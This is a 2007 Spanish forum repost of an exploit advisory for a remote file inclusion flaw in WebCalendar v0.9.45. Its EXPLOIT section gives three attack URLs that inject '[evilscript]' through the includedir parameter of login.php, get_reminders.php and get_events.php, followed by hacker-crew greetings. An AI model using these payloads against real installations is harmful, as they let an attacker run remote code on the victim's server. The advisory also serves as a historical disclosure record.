babilonics.com

	Inicio de sesión
	Nombre de usuario: * Contraseña: * Crear cuenta nueva Solicitar nueva contraseña

	Nuevos
	monica omar06 matuti edufox pedroluisgf

WebCalendar version 0.9.45 suffers from a remote file inclusion vulnerability in login.php.

Enviado por OeX el Ma, 20/03/2007 - 11:21.

autor:

Drackanz[at]gmail.com

|-------------------------------------------------------------------------------|
|                                                                               |
|  WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include            |
|                                                                               |
|    Script  : WebCalendar                                                      |
|    Version : v0.9.45 (13 Dec 2004)                                            |
|    Authord : Drackanz                                                         |
|    Contact : Drackanz [at] gmail [] com                                       |
|    Vendor  : http://www.k5n.us/webcalendar.php                                |
|-------------------------------------------------------------------------------|
|            Bug in :                                                           |
|                      login.php                                                |
|                     get_reminders.php                                         |
|                      get_events.php                                           |
|-------------------------------------------------------------------------------|
|   EXPLOIT :                                                                   |
|                                                                               |
|   http://localhost/[calendar]/ws/login.php?includedir=[evilscript]            |
|   http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript]    |
|   http://localhost/[calendar]/ws/get_events.php?includedir=[evilscript]       |
|-------------------------------------------------------------------------------|
| Greetz : Leo,hardose,s4mi,fucker_net,The Casper,Broken-Proxy,Simo64,          |
|           exe_crack,b0rizq,righterz,dragon,rachidox All Moroccan HackerX;     |
|		                                                                        |
---------------------[ [Mor0ccan ISLAM Defenders Team] ]-------------------------

649 lecturas

Inicio de sesión

Menu

Nuevos

WebCalendar version 0.9.45 suffers from a remote file inclusion vulnerability in login.php.

Responder